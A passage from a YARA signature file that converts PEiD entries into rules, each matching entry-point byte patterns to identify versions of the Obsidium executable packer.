33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 4F 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n        $b = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_11114_11115_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1D 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1357_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1357_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_unknown_version: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 50 EB 03 ?? ?? ?? E8 ?? 00 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 E7 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 